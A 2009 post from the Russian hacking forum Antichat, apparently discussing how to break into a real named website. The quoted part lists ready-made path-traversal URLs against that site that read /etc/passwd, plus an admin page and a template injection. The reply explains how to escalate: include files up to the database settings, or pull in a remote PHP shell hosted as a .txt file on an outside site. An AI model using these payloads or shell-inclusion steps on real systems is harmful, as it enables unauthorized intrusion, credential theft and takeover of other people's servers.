31.01.2009, 11:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Mirella
http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world
что можно с этим добром сделать ? как дальше пройти?
Чего-то я там не вижу php-include. Может прикрыли уже? Но как вариант было найти реальный путь, и инклюдить файлы, начиная с index'a и дойдя так до БД слогами, но надо, что бы там было читалка. Можно было провести удаленный php-include, т.е. file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!
|
|
|